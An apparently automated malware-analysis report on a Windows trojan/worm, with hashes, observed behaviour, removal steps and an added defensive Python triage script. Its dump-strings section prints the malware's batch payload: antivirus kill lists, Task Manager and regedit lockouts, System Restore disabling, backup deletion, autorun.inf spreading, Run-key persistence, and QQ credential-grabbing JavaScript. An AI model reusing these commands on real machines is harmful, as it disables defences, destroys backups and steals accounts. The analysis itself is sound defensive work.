HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.380DE3A6 (B) (Emsisoft), Generic.Malware.SFMDYBVd.380DE3A6 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, WormAutorun, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a823d3943c7ecc605d5e5a2346eec144
SHA1: eb47cadac6c5d8d7e773bb41c91363c90bb181bf
SHA256: c46c81403bc2643dd9cbad88c3bf9bf1e0b82adc1fe6db44df2131cd0a03dc49
SSDeep: 6144:nq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg8OM0bzp45fW:q9N3JV6kr1cVOWdCLFfXf8gnp41W
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: Packer: UPX Compresor Gratuito (www.upx.sourceforge.net), UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Generic creates the following process(es):
net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644
The Generic injects its code into the following process(es):
%original file name%.exe:1756
Mutexes
The following mutexes were created/opened:
RasPbFileShimCacheMutex
File activity
The process %original file name%.exe:1756 makes changes in the file system.
The Generic creates and/or writes to the following file(s):
C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)
Registry activity
The process %original file name%.exe:1756 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 16 E1 49 03 B3 D8 72 E9 4D AF FC EE 14 31 D0"
To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
The process net.exe:1364 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F6 22 70 43 C0 C8 57 FE 6D 41 29 4E 51 1A F0"
The process net.exe:1772 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 69 8C 28 D6 E0 14 4D 51 9F 20 DE C2 2D 93 22"
The process net1.exe:1316 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 36 7D 30 6D 4A 0A 9E 92 98 50 4A EE 5B 12 7F"
The process net1.exe:644 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 78 7E 91 FB 80 78 06 E8 4F 84 B4 8E C5 03 C3"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer. This vector only works where Windows still honours autorun.inf on removable media, as the Windows XP SP3 sandbox used for this analysis does; Windows 7 and later, and XP/Vista with update KB971029 installed, ignore autorun.inf on non-optical drives, so on those systems the dropped copies are inert unless a user launches them by hand.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644
- Delete the original Generic file.
- Delete or disinfect the following files created/modified by the Generic:
C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
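The manual steps above cover only what the sandbox observed at run time. The batch fragments recovered from the process dump (see "Strings from Dumps" below) show a much wider payload: a process kill list aimed at security products, Explorer and System policy values that lock the user out of Task Manager, regedit and the Run dialog, System Restore being disabled, a batfile handler tweak, `assoc ... =nullfile` sabotage, deletion of Norton Ghost images, and autorun.inf propagation. The following Python script is an added example written for this page, not part of the Lavasoft report or of the malware; it triages such strings into behaviours and turns the registry writes into a `reg delete` checklist an analyst can review before cleaning a host. The sample input is a constructed subset of the strings in the dump section (with the batch `+r +s +h` attribute switches written out); the category names and regular expressions are this example's own, and the `%s%` placeholder in the kill lines is assumed to stand for a taskkill-style command, which the report does not confirm.

```python
"""Triage of command-line fragments recovered from a process dump.

Added example for this report, not Lavasoft's output: it classifies batch
commands like those under "Strings from Dumps" into behaviours and derives
the reg.exe commands that would undo the registry values they set.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of this report's dump strings. The last entry
# is the malware's User-Agent, included as a line that matches no rule.
SAMPLE_STRINGS = [
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"',
    r'%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul',
    r'%s% /im KAV* /f >nul',
    r'%s% /im 360safe.exe /f >nul',
    r'REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD',
    r'REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d',
    r'REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d',
    r'HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat',
    r'echo [AutoRun] >d:\autorun.inf',
    r'echo Open=setup.bat >>d:\autorun.inf',
    r'for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf',
    r'assoc .exe=nullfile',
    r'assoc .reg=nullfile',
    r'for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul',
    r'attrib %windir%\system32\cmd.bat +r +s +h',
    r'shutdown -s -t 0 && del / f / s / q c:\slear.bat',
    r'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)',
]

# hive\path followed by "/v name"; the path is matched lazily so keys that
# contain a space ("Windows NT") survive.
KEY_VALUE_RE = re.compile(r'(HK(?:EY_[A-Z_]+|LM|CU|CR|U))\\(.+?)\s+/v\s+"?([^"\s]+)"?', re.I)
KILL_RE = re.compile(r'/im\s+(.+?)\s+/f\b', re.I)            # image-name kill list (taskkill-style)
ASSOC_RE = re.compile(r'^assoc\s+(\.\w+)=nullfile', re.I)     # breaks file-type handlers
AUTORUN_RE = re.compile(r'autorun\.inf|^echo\s+Open=', re.I)  # removable-drive propagation
GHO_RE = re.compile(r'\bdel\b.*\.gho\b', re.I)               # deletes Ghost backup images
HIDE_RE = re.compile(r'\battrib\b.*\+?r\s+\+?s\s+\+?h\b', re.I)
SHUTDOWN_RE = re.compile(r'\bshutdown\s+-s\b', re.I)


def normalize(line: str) -> str:
    """Collapse the `" "` trick batch files use to embed a space in an unquoted path."""
    return line.replace('" "', ' ').strip()


def classify_registry_key(key: str) -> str:
    """Map a registry key to the behaviour that writing to it implies."""
    k = key.lower()
    if 'batfile\\shell\\open\\command' in k:
        return 'handler_hijack'
    if 'systemrestore' in k:
        return 'system_restore_disable'
    if '\\policies\\' in k:
        return 'ui_lockout'
    if '\\currentversion\\run' in k:   # Run and RunOnce
        return 'persistence'
    return 'registry_other'


def triage(lines):
    """Return {behaviour: [evidence, ...]} for a list of recovered strings."""
    findings = defaultdict(list)
    for raw in lines:
        line = normalize(raw)
        for m in KEY_VALUE_RE.finditer(line):
            hive, path, value = m.groups()
            key = f'{hive}\\{path}'.strip('"')
            findings[classify_registry_key(key)].append((key, value))
        for m in KILL_RE.finditer(line):
            findings['process_kill'].extend(m.group(1).split())
        m = ASSOC_RE.match(line)
        if m:
            findings['assoc_sabotage'].append(m.group(1).lower())
        if AUTORUN_RE.search(line):
            findings['removable_propagation'].append(line)
        if GHO_RE.search(line):
            findings['backup_destruction'].append(line)
        if HIDE_RE.search(line):
            findings['file_hiding'].append(line)
        if SHUTDOWN_RE.search(line):
            findings['forced_shutdown'].append(line)
    return dict(findings)


def reg_delete_commands(findings):
    """reg.exe commands that remove the values the script adds: a review checklist, not to run blindly."""
    cmds = []
    for cat in ('persistence', 'ui_lockout', 'system_restore_disable', 'handler_hijack'):
        for key, value in findings.get(cat, []):
            cmds.append(f'reg delete "{key}" /v {value} /f')
    return cmds


if __name__ == '__main__':
    result = triage(SAMPLE_STRINGS)
    for behaviour, evidence in sorted(result.items()):
        print(f'{behaviour}: {len(evidence)} hit(s)')
    print('\n'.join(reg_delete_commands(result)))
```

Two details matter in practice. The `" "` sequences in the dumped paths are not garbage: cmd.exe treats `Windows" "NT` as `Windows NT`, so the normaliser has to collapse them before a key can be matched. And the Run value `reboot_system` is classified as both persistence and a forced shutdown, which is accurate: its payload is `shutdown -s -t 0`, so an infected machine that still has that value powers off at every logon, which is why the removal list above has to be applied from an environment where the Run key is not executed.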
Static Analysis
VersionInfo
Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 651264 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 655360 | 290816 | 287232 | 5.49401 | d3b9f527d2e9a1552783d2289ad5c0b8 |
.rsrc | 946176 | 16384 | 16384 | 2.49987 | e2784112b04c223b0d25494fb365f9a9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
caf03e9cc3118627cd7c3d133a311224
0a9ae60a1507dc9b0141dcb01ee413f6
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Generic connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1756:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
atl.dll
atl.dll
wininet.dll
wininet.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
NTDLL.DLL
NTDLL.DLL
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
sleartest.exe
sleartest.exe
dll.bat
dll.bat
\*.dll
\*.dll
exe.bat
exe.bat
\*.exe
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
http=
https
https
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
hXXp://
hXXp://
len = str.length; i
len = str.length; i
var t = QZONE.FormSender;
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
var a = QZFL.string.trim(fm.action);
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
fm.action = a
fm.action = a
slear && del / f / s / q c:\slear.bat
slear && del / f / s / q c:\slear.bat
c:\slear.bat
c:\slear.bat
cmd.exe
cmd.exe
c:\windows\system\shutdown.bat
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat r s h
attrib %windir%\system32\cmd.bat r s h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
start d:\setup.bat /min >nul
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat r s h%
attrib %windir%/system32/explorer.bat r s h%
attrib %systemroot%/windows.bat r s h
attrib %systemroot%/windows.bat r s h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
